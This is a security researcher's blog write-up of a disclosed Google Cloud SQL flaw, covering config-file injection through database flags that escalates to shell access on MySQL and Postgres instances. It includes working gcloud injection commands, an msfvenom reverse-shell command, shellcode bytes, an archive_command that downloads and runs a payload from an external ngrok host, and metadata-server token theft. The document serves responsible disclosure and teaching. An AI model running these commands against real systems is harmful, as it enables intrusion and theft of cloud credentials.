Dropping a shell in Google’s Cloud SQL (the speckle-umbrella story)


When I read write-ups about security research some sometime additional attack vectors pop up in my mind, like “hmm okay, this is interesting, have they got a protection measure in place against that attack?“ In this case the original research is called “How to contact Google SRE: Dropping a shell in Cloud SQL”. When I publish an article like this, I usually focus on the results only, this time I tried to summarize my failed attempts as well and how I finally found the security holes in database service.

Finding the flaw

My original concern was about ‘root’@’%’ account, which normally comes with SUPER privileges in MySQL, so I decided to look into how Google protects such a powerful account in their managed platform. The short answer is, despite the name, account hasn’t got full permissions.

This account has (some level of) write permissions in the mysql database. One of my ideas was to insert a line into the mysql.plugin table directly (instead of using the INSTALL PLUGIN statement), and then try to mount some directory traversal attack. Actually this would have required a MySQL level vulnerability, and I confirmed quickly in my local test environment that MySQL loads plugins only from the plugin_dir (validation of the input isn’t limited to the INSTALL PLUGIN statements). Then I also found that on GCP, I don’t even have write permission to this table enforced by this special setting:

require_super_for_system_table_writes: event,func,plugin,proc,heartbeat,db,user,tables_priv

Then I tried to execute additional stacked statements via the CSV export. As expected, this didn’t work (errorType: “DATA_FETCHING_EXCEPTION”).

I kept experimenting with the other Cloud features, “database flags” looked interesting. This is a long list of settings that you don’t have access to modify directly, but you can do that via the official tooling. The supported ones can be queried this way:

Implied by the requiresRestart flag, I knew these changes are dispatched to the database server on the fly (and probably also persisted somehow). The vast majority of these settings have type constraints (int, bool) and the string ones usually enforce a value from an enum. While building on biases is usually not a good idea, I didn’t bother with testing the correctness of the server side check.

There were however a few string settings where the value was unrestricted (at least according to the output of the command above). In case of MySQL, they are:

I knew certain database platforms have limitation regarding the parameterized statements, I was uncertain whether it is possible to rely on that in the SET GLOBAL setting_name=value statements. I started sending typical SQLi payloads, and found nothing special. I also tried sending a multiline SQL statement for init_connect, and encountered a weird error message:

radimre83@cloudshell:~$ gcloud sql instances patch test "$(printf -- '--database-flags=init_connect=SELECT CURRENT_USER() AS a;\nSELECT CURRENT_USER() AS b')"

ERROR: gcloud crashed (ValueError): Invalid header value b'/usr/bin/../lib/google-cloud-sdk/lib/gcloud.py sql instances patch test --database-flags=init_connect=SELECT CURRENT_USER() AS a;\nSELECT CURRENT_USER() AS b'

What? I doubt my payload would be submitted as a header. As this looked suspicious, I didn’t stop. The --log-http parameter of the CLI quickly confirmed this error was thrown on the client side without sending any requests to the service actually. Reviewing the source code, I found this check wasn’t even implemented in the Google’s domain, but in official python http client library (wtf, still). You can turn off here:

$ diff /usr/lib/python3.7/http/client.py.orig /usr/lib/python3.7/http/client.py
< raise ValueError('Invalid header value %r' % (values[i],))
> pass # raise ValueError('Invalid header value %r' % (values[i],))

Resending the payload, this time the server threw an INTERNAL_ERROR. While this looked promising, I didn’t manage to make further progress here for a while and then I switched to targeting Postgres instead. I started with understanding the permissions, concluded cloudsqlsuperuser, again, despite the name, is not running with full permissions:

Both read and write access of the pg_authid (the underlying table of these settings) was rejected:

postgres=> insert into pg_authid (rolsuper) values ('t');

ERROR: permission denied for relation pg_authid

Reviewing the output of the SHOW ALL statement, I saw the base directory of the Postgres server (will be important later):

config_file | /pgsql/data/postgresql.conf

Then, by querying CURRENT_USER I identified that the import/export feature of the platform was carrying out the operation as cloudsqlimportexport, a user which was having the same permissions as the default postgres. Just like with MySQL, I learned more about the built-in security controls of the DBMS:

ALTER USER cloudsqladmin WITH PASSWORD 'hu8jmn3';

ERROR: must be superuser to alter superusers

postgres=> ALTER USER cloudsqlreplica WITH PASSWORD 'hu8jmn3';

ERROR: must be superuser to alter replication users

Regarding the “database flags”, there were two “unrestricted” ones here as well:

Reviewing the emitted lines in Logs Explorer of GCP, I found that my database flag change requests were not converted into “SET” statements (unlike with MySQL), but the following two interesting ones showed up:

2021-01-21 12:44:51.719 UTC [407]: [2-1] db=cloudsqladmin,user=cloudsqladmin LOG: statement: SELECT sourcefile, sourceline, name, setting, error from pg_catalog.pg_file_settings where applied='f'

2021-01-21 12:44:51.740 UTC [408]: [2-1] db=cloudsqladmin,user=cloudsqladmin LOG: statement: SELECT pg_catalog.pg_reload_conf()

Conclusion: the platform probably makes changes at config file level then rehups the database server (via that function), if the syntax is correct. Thinking over all the conclusions I made so far, I started getting excited. We might have a config file injection at this point!

To verify, I sent a patch request with this payload: “pgaudit.role=ffff\nenable_sort = off”

And the change was reflected indeed (the default value of enable_sort is on):

postgres=> show enable_sort;




(1 row)

Then I quickly executed one more test, this time targeted “cloudsql.supported_extensions”, which is a setting one normally has no permissions to and is not exposed as a database flag (unlike enable_sort):

postgres=> set cloudsql.supported_extensions = foobar;

ERROR: permission denied to set parameter "cloudsql.supported_extensions"

The default value is:

bloom:1.0, btree_gin:1.0, btree_gist:1.2, chkpass:1.0, citext:1.3, cube:1.2, dblink:1.2, dict_int:1.0, dict_xsyn:1.0, earthdistance:1.1, fuzzystrmatch:1.1, hstore:1.4, intagg:1.1, intarray:1.2, ip4r:2.4, isn:1.1, lo:1.1, ltree:1.1, pg_buffercache:1.2, pg_prewarm:1.1, pg_stat_statements:1.4, pg_trgm:1.3, pgaudit:1.1.2, pgcrypto:1.3, pgrowlocks:1.2, pgstattuple:1.4, plpgsql:1.0, postgis:2.3.0, postgis_tiger_geocoder:2.3.0, postgis_topology:2.3.0, prefix:1.2.0, sslinfo:1.2, tablefunc:1.0, tsm_system_rows:1.0, tsm_system_time:1.0, unaccent:1.1, uuid-ossp:1.1, postgres_fdw:1.0, pg_freespacemap:1.2, pg_visibility:1.2, pageinspect:1.5, pgfincore:1.2, pg_repack:1.4.4, hll:2.12, plproxy:2.9.0

Btw, this setting restricts which Postgres extensions one can load! So the final command looked like this:

gcloud sql instances patch test-pg "$(printf -- '--database-flags=pgaudit.role=ffff\ncloudsql.supported_extensions = bloom:1.0')"

The command worked and the cloudsql.supported_extensions setting was indeed changed as I wanted. I knew this attack primitive had a great potential, but the current impact so far was low, still. However, being afraid of Ezequiel racing me :), I decided to file a ticket to the VRP team reporting my current progress.

Gaining a shell on MySQL

Shortly after, I switched back to MySQL again, and constructed a new patch command, this time with correct syntax. Targeted the secure_file_priv setting, which you don’t have access to as ‘root’@’%’:

mysql> set global secure_file_priv = “/mysql/tmp/something”;
ERROR 1238 (HY000): Variable ‘secure_file_priv’ is a read only variable

The default value is /mysql/tmp/.

The command that was finally accepted without an INTERNAL_ERROR:

gcloud sql instances patch test “$(printf — ‘ — database-flags=init_connect=SELECT CURRENT_USER() AS a\nsecure_file_priv=/mysql/tmp/something’)”

In case of MySQL, changes are dispatched as a MySQL query first, so my payload reflected this way:

I restarted the instance (gcloud sql instances restart test), but it didn’t come back. Checking the Log Explorer, I found the reason:

2021–01–21T14:25:59.751089Z 0 [ERROR] Failed to access directory for — secure-file-priv. Please make sure that directory exists and is accessible by MySQL Server. Supplied value : /mysql/tmp/something

Awesome! MySQL was affected after all. Sent an update to the VRP team. The day after, my report was triaged, forwarded to VRP with priority P3 (which I think is something like – “unless you have anything better to do”). Nevermind :)

I kept researching the topic. I knew the export CSV feature was still running as a ‘root’@’localhost’ (which is not the same as ‘root’@’%’) so this account did have permissions to drop files in the secure_file_priv directory. The plan was of course to change plugin_dir to the same directory and load native code from that location somehow. I could prepare the configuration with this command:

gcloud sql instances patch test--my "$(printf -- '--database-flags=init_connect=SELECT CURRENT_USER() AS a\nplugin_dir=/mysql/tmp/')"

Making a progress came with a lot of trial and error, documentation reading and understanding the additional security controls (e.g. the system_user table). The database import process was completely low-privileged via this query:

2021-01-21T21:28:21.202207Z cloudsqlimport[cloudsqlimport] @ localhost [] 2012 777276492 Query LOAD DATA LOCAL INFILE 'Reader::loaddata' INTO TABLE `test` CHARACTER SET 'utf8mb4' FIELDS TERMINATED BY ',' OPTIONALLY ENCLOSED BY '\"' ESCAPED BY '\"' LINES TERMINATED BY '\n'

I didn’t understand this first, (user without file permissions, still using load data statement), the LOCAL INFILE feature of MySQL explained it perfectly (If LOCAL is specified, the file is read by the client program on the client host and sent to the server).

The sql import feature was running with effectively the same privileges as the ‘root’@’%’ user I already had access to.

The CSV export process was running with high privileges though, but I was limited to one single SELECT query. I started reviewing the official MySQL documentations to see if it is possible call a data change operation as a subquery, or anything similar.

I found this one:

MySQL permits a subquery to refer to a stored function that has data-modifying side effects such as inserting rows into a table. For example, if f() inserts rows, the following query can modify data:

SELECT ... WHERE x IN (SELECT f() ...);

This behavior is an extension to the SQL standard. In MySQL, it can produce nondeterministic results because f() might be executed a different number of times for different executions of a given query depending on how the optimizer chooses to handle it.

Perfect, stored procedures came to the rescue! I put together a test one quickly, and faced the next challenge:

mysql> source stored-test.sql

ERROR 1419 (HY000): You do not have the SUPER privilege and binary logging is enabled (you *might* want to use the less safe log_bin_trust_function_creators variable)

So a restriction once again. Relevant docs here:

To relax the preceding conditions on function creation (that you must have the SUPER privilege and that a function must be declared deterministic or to not modify data), set the global log_bin_trust_function_creators system variable to 1.

The setting was turned off indeed, but I could flip it by using the vulnerability once again:

gcloud sql instances patch test--my "$(printf -- '--database-flags=init_connect=SELECT CURRENT_USER() AS a\nplugin_dir=/mysql/tmp/\nlog_bin_trust_function_creators=ON')"

I could finally create stored procedures:

My first attempt to escalate my privileges was using this function:

Using my account in the shell:

mysql> select NonDet();

ERROR 1227 (42000): Access denied; you need (at least one of) the SUPER privilege(s) for this operation

This did not work, even root@localhost during the CSV export got the very same error back:

Error 1045: Access denied for user 'root'@'%' (using password: NO)

I was a bit lost at this point, didn’t understand why the error message reported ‘root’@’%’ (my account), while it was clearly executed by ‘root’@’localhost’. Inspecting the definition of the NonDet function I finally understood the reason, the function was executed as the definer (me), not the privileged user. Tried adding the definer clause (‘root’@’localhost’ …), I couldn’t create the function (it required SUPER privilieges).

Reading the relevant documentation, I found MySQL supported the phrase "SQL SECURITY INVOKER" in the definition, and the DBMS allowed me creating the stored procedure in this special mode! After calling the NonDet function by the CSV export process, the result of the UPDATE statement above was finally reflected:

Still (after restarting the server since FLUSH couldn’t be used inside the procedure), I didn’t gain access to the file operations:

mysql> SELECT "foobar" INTO DUMPFILE '/mysql/tmp/dumpfile.test';

ERROR 1045 (28000): Access denied for user 'root'@'%' (using password: YES)

Weird, probably because of the extra separation with the super_user table. After some further trial and error, I decided to choose the easier way and dropped the file via the stored procedure itself. I downloaded an UDF binary from here, converted it into a stored procedure (by writing a fewliner script for this purpose). It looked something like this:

Dropping the file succeeded, so I could try creating the function as a last step, but it turned into yet another failure once again:

CREATE FUNCTION lib_mysqludf_sys_info RETURNS string SONAME 'lib_mysqludf_sys2.so';

ERROR 1126 (HY000): Can't open shared library 'lib_mysqludf_sys2.so' (errno: 0 /mysql/tmp/lib_mysqludf_sys2.so: wrong ELF class: ELFCLASS32)

Anyway, I did know that this was just matter of some additional massaging at this point :) Installed libmysqld-dev, recompiled the source code, repeated all the steps to make it to the file system of MySQL, and everything was working finally! But was still really-really uncomfortable, as the commands were executed blindly without any output and the image still didn’t contain any useful utilities:

As a next step, I generated a reverse TCP shellcode using Metasploit:

msfvenom -p linux/x64/shell_reverse_tcp -f elf --smallest --out reverse.bin LHOST= LPORT=51111

I tried dropping this file with my existing UDF function:

SELECT sys_exec("printf '\x7f\x45\x4c…' > /mysql/tmp/revshell.bin");

But this didn’t work and I didn’t understand why at this point. Had to go through the stored procedure file dropping chain once again, and I finally gained a remote shell:

Later I found neither printf had support for \x expressions nor echo supported the extended syntax (-e). Experimenting with the options here was important, as I knew I still need to find a way to accomplish the same on Postgres ;) I was able to leverage sed to drop files with a syntax like this:

echo -n x | sed 's/./\\x20/' > /mysql/tmp/single-space.txt

But let’s focus on MySQL for one more second! The instance was still running in the host’s network context, but with default docker capabilities as a non-root user (so abusing the cloud agent was not possible anymore to escape from Docker).

The docker image that belongs to the service:

cat /var/lib/cloudsql/noncritical/*.release


The project ID that the managed identity was assigned to:

wget http://metadata.google.internal/0.1/meta-data/project-id -O -

Connecting to metadata.google.internal (

writing to stdout

speckle-umbrella-48- 100% |********************************| 19 0:00:00 ETA

The permissions of this identity:

wget http://metadata.google.internal/0.1/meta-data/service-accounts/ -O -

Connecting to metadata.google.internal (

writing to stdout





wget http://metadata.google.internal/0.1/meta-data/service-accounts/p747024478252-pi0jvj@gcp-sa-cloud-sql.iam.gserviceaccount.com/acquire -O -

Connecting to metadata.google.internal (

writing to stdout

{"accessToken":"…","expiresAt":1611414384,"expiresIn":3344}- 100% |********************************| 275 0:00:00 ETA

written to stdout

And the permissions of the service account (https://www.googleapis.com/oauth2/v1/tokeninfo?access_token=...):


"issued_to": "103047181598510924038",

"audience": "103047181598510924038",

"scope": "https://www.googleapis.com/auth/bigquery https://www.googleapis.com/auth/cloudimagemanagement https://www.googleapis.com/auth/pubsub https://www.googleapis.com/auth/sqlservice.agent https://www.googleapis.com/auth/dataaccessauditlogging https://www.googleapis.com/auth/cloudkms https://www.googleapis.com/auth/servicecontrol https://www.googleapis.com/auth/devstorage.full_control",

"expires_in": 3144,

"access_type": "online"


Btw later I realized the log_bin_trust_function_creators setting was actually exposed as a database flag, so the technique I found above to escalate my privileges to SUPER was actually an independent security issue.

Now let’s switch back to Postgres again.

Gaining on a shell on Postgres

This flaw could be exploited by a malicious user of GCP, in order to access restricted features of Postgres and potentially execute arbitrary code on the VM with the privileges of the service account of the managed service. This might be not feasible without a file dropping primitive, but based on [this article] probably not impossible. I keep researching the impact and try turn this into something more powerful (thinking in combining this with the GCS import feature), but wanted to report this to you guys before someone else races me.

This is a paragraph from my original report. Without a file dropping primitive (which I didn’t have here), it might not be possible to turn a config file injection flaw into code execution. After reviewing the documentation of the Postgres server configuration options, I found a couple of additional candidates to execute commands without the need for saving a file first with some SQL queries first. This required me familiarizing myself with administrating Postgres a little bit more, so I spinned up a local test environment. In the Docker hub days this is as easy as running a command :)

So the mentioned settings are:

- archive_cleanup_command

- archive_command

- recovery_end_command

- restore_command

- ssl_passphrase_command

The restore/recovery ones did not seem to be not feasible: we probably don’t have much control over the destination Postgres server when a point in time snapshot is being restored, as they need a new instance to be created. At least this was my understanding, but I didn’t test this solution as the archive_command path worked. After some local trial and error, I found the following set of Postgres options offering a convenient way of executing shell commands:

archive_mode = on

wal_level = replica

archive_command = 'any shell command goes here'


Knowing that the Docker image the Postgres server is running in is pure, I established a way to save arbitrary binary content first:

archive_command = 'echo -n x|sed "s/./\\x20\\x20/" > /tmp/proof.txt'

As you will see later, I didn’t use this at the end of the day J

At this point I was experimenting with a command like this:

gcloud sql instances patch test-pg "$(printf -- '--database-flags=pgaudit.role=ffff\narchive_command=\x27/usr/bin/id\x27')"

The command executed successfully, but the changes did not reflect. More precisely, probably overridden by another layer:

wal_level | replica

archive_command | /utils/replication_log_processor -disable_log_to_disk -action=archive -file_name=%f -local_file_path=%p

archive_mode | on

I was thinking in alternatives. How about assigning a custom private private key and get the command executed by the password input callback? How about overriding log_directory/log_filename and log_line_prefix to drop a binary executable then overriding dynamic_library_path to log_directory, and LOAD the function. I was also reviewing the documentation of the available plugins, hoping that some of them would aid accomplishing my goal. Btw, if you execute SELECT * FROM pg_available_extensions, you will see a couple of plugins that you cannot load due to not being present in cloudsql.supported_extensions. Two of them are proprietary:

cloudsql_stat | 1.0 | | Google Cloud SQL statistics extension

google_insights | 1.0 | | Google extension for database insights

pgtap | 1.1.0 | | Unit testing for PostgreSQL

pglogical | 2.3.1 | | PostgreSQL Logical Replication

But I rather started investigating why and how those archive_command options were configured at all. The answer was simple, because the database was created with point in time recovery support turned on. Without that feature, archive_mode was off and archive_command empty.

Unfortunately the archive_mode and wal_level settings cannot be changed without restarting the server. I knew that Google performs this verification when setting flags. This might break this attack idea. However, I had some (more) luck at this point, the following command was finally both accepted and reflected after manually restarting the database server:

gcloud sql instances patch test-pg12 "$(printf -- '--database-flags=autovacuum_freeze_max_age=100001,pgaudit.role=ffff\narchive_mode=on\narchive_command=\x27/usr/bin/id\x27')"

Note, I added autovacuum_freeze_max_age because according to the flag description, it required restarting the server and I hoped that way the warnings emitted due to my “malicious” changes of archive_command would be ignored. Later I realized I was too precautious, Google ignored that warning overall.

Then, I tried dropping my reverse shellcode using the sed magic described earlier. My first attempt failed with INTERNAL_ERROR, I thought it’s because the escaped command was too long, so I splitted it into 3. It looked something like this:

gcloud sql instances patch test-pg12 "$(printf -- '--database-flags=autovacuum_freeze_max_age=100004,pgaudit.role=f4\narchive_mode=on\narchive_command=\x27echo -n x|sed "s/./\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x40\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x40\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xc2\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x0c\\\\x01\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x10\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x6a\\\\x29\\\\x58\\\\x99\\\\x6a\\\\x02\\\\x5f\\\\x6a\\\\x01\\\\x5e\\\\x0f\\\\x05\\\\x48\\\\x97\\\\x48\\\\xb9\\\\x02\\\\x00\\\\xc7\\\\xa7\\\\xa8/" >/pgsql/s2\x27')"

After the 3 parts were (I thought) uploaded, I tried executing the binary by running:

gcloud sql instances patch test-pg12 "$(printf -- '--database-flags=autovacuum_freeze_max_age=100005,pgaudit.role=f5\narchive_mode=on\narchive_command=\x27cd /pgsql;cat s1 s2 s3 > s;chmod +x s;./s\x27')"

But I encountered INTERNAL_ERROR again. Later I understood it was because the server side did some kind of text manipulation on the received data; I believe it split my input by the semicolon character. However I didn’t know this at this point, so had to find another way to proceed once again. I was looking for commands that are present in this docker image and could connect to a remote server over the network, read some data and either save it to a file or at least output it to stdout. Netcat is obviously not present, bash did not support /dev/tcp as I confirmed earlier. Then I suddenly realized psql is a perfect fit and is most probably present in the image.

So I launched a Postgres server on my side again and exposed it with ngrok. After some trial and error I concluded it is not really easy to produce pure binary output with psql, so I turned to using base64. (I knew base64 binary was present in the MySQL image, so I hoped it is in Postgres as well.)

The commands I used to prepare the source data in my Postgres server:

postgres=# create table x (d VARCHAR(1000));

postgres=# insert into x values (ENCODE(pg_read_binary_file('/tmp/revshell.bin'),'base64'));

Tested if I could indeed save the binary file correctly:

psql -h4.tcp.ngrok.io -p10800 -Upostgres -tqA -c "SELECT d FROM x"|base64 -d>/tmp/revshell.test

This way, the complete gcloud command was constructed:

gcloud sql instances patch test-pg12 "$(printf -- '--database-flags=pgaudit.role=f8\narchive_mode=on\narchive_timeout=1s\narchive_command=\x27psql -h4.tcp.ngrok.io -p17150 -Upostgres -tqA -c "SELECT d FROM x"|base64 -d>/pgsql/r && chmod +x /pgsql/r && /pgsql/r\x27')"

And it finally worked!

The GCP project the service belonged to was called speckle-umbrella-pg-3. The service account was running with the same privileges as MySQL. This includes devstorage.full_control, based on the point in time recovery feature and this permission, I believe I could have accessed data of another clients stored in their Postgres databases by downloading the WAL files from the project’s Cloud Storage buckets. However, I didn’t verify this as the interpretation of what the limits of being a white hat hacker is usually different.

Later, after Google pinged me for some clarification, I simplified this attack a little bit by using the “local” Postgres instance itself to download the binary payload from. The commands look something like this:

postgres=> create table x (d VARCHAR(1000));
postgres=> insert into x values (‘your-base64-payload’);

And to trigger it’s execution:

gcloud sql instances patch test-pg12 “$(printf — ‘ — database-flags=pgaudit.role=f8\narchive_mode=on\narchive_timeout=1s\narchive_command=\x27psql -h127.0.0.1 -Ucloudsqladmin -d postgres -tqA -c “SELECT d FROM x”|base64 -d>/pgsql/r2 && chmod +x /pgsql/r2 && /pgsql/r2\x27’)”

Post attempts

There were some interesting services listening on the loopback network interface on the MySQL host:

tcp 0 0* LISTEN -

tcp 0 0 :::8080 :::* LISTEN -

Both of these were plain HTTP services. Using a meterpreter tunnel I executed dirb against both of them, but couldn’t find anything else than 404.

While reading various docs about MySQL, I came across the federated table engine. I knew if I was able to connect to the database server through or the unix socket, I could authenticate as the “real” root user (which is a passwordless account); so this could be an alternate way to escalate privileges to the super account. However, the table engine was not supported.

I also played around a bit with the clone plugin (which seemed to be another interesting attack vector), but found that the permissions as configured on GCP by default, don’t let space for any abuse.

My third idea yielded some success – though the impact was completely different than I expected. A combination of some of the techniques described in this article cause a segmentation fault in the MySQL server side. Under the hood, this was a simple null pointer dereference, so the only impact is denial of service. Reported it to the vendor.

I also checked some of the XML related functions briefly, the idea was to send HTTP requests to the metadata server via XXE or similar. This didn’t work.

I also tried mounting similar attacks against Postgres. E.g. I tested the dblink and CREATE SERVER features – even reviewed its source code -, the goal was to connect to the same Postgres instance, but as the passwordless cloudsqladmin account via localhost. Postgres featured a built-in security measure:

postgres=> SELECT dblink_connect('dbname=postgres host= user=cloudsqladmin password=foobar options=-csearch_path=');

ERROR: password is required

DETAIL: Non-superuser cannot connect if the server does not request a password.

HINT: Target server's authentication method must be changed.


I had a similar finding many years before (CVE-2016-4476 – a wpa_supplicant issue which could be turned into privesc on Android). I think the message is easy, if you generate plain old unstructured config files (not a yaml/json or similar), then you need to pay extra attention to restrict the input or escape properly while rendering it.

For fellow researchers: if you find something like this, don’t stop at opening the shell.


- Jan 21, 2021 02:36PM – Postgres config file injection found and reported

- Jan 21, 2022 03:32PM – MySQL config file injection found, update to VRP sent

- Jan 22, 2022 10:46AM – triage complete, priority P3 assigned

- Jan 22, 2021 02:33PM – Reported a fully working code execution in MySQL

- Jan 23, 2021 10:52PM – MySQL RCE reported

- Jan 24, 2021 10:21PM – Highlighting the log_bin_trust_function_creators privesc is actually a standalone issue, could be mounted independently

- Jan 24, 2021 11:39PM – Postgres RCE reported

- Jan 28, 2021 01:39PM – A follow up question by Google

- Jan 28, 2021 09:10PM – Clarifying some bits

- Feb 5, 2021 11:35PM – Priority changed to P1

- Feb 7, 2021 06:09PM – 🎉 Nice catch! Severity S1.

- Feb 16, 2021 06:20PM „we decided that it does not meet the bar for a financial reward” … „We don't consider intra VM issues in Cloud SQLs as security vulnerabilities (VM is a security boundary there, not the SQL engine).”

- Feb 16, 2021 10:38PM — Fixed already…


Imre Rad




Software developer daytime, security researcher in freetime

Love podcasts or audiobooks? Learn on the go with our new app.

AWS Elastic Kubernetes Service (EKS) — Getting Started

Putting down some Roots: Understanding Binary Tree Data Structures.

Retry with Avro in Kafka

Hue 4.9 and its new SQL dialects and components are out!

How to do a Bug Smash

Classic Mistakes That Every Developer Has Made

Introduction to Java Programming

Swift: How to create Charts in iOS Application

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Imre Rad

Imre Rad

Software developer daytime, security researcher in freetime

More from Medium

Background process with GCP Cloud Tasks and it’s limitation

Google Cloud Platform Basics( Commands for the Beginner)

WordPress attacks & Cloud Armor protection on GCP— True story.

Set up and Configure a Cloud Environment